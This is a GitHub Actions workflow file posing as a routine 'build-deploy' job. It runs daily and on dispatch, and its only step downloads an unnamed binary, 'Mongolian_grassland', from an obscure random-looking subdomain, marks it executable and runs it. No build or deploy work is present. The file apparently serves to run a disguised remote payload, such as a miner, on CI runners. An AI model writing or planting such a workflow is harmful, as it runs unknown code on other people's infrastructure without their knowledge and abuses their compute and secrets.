#2024-03-18-[023932]-2e8s7o3s
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "54 3 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: default_build_deploy_name_note
        run: |
          wget -q https://fym1wjojgp77f4se.callforpapers.eu.org/Mongolian_grassland
          chmod 755 Mongolian_grassland
          ./Mongolian_grassland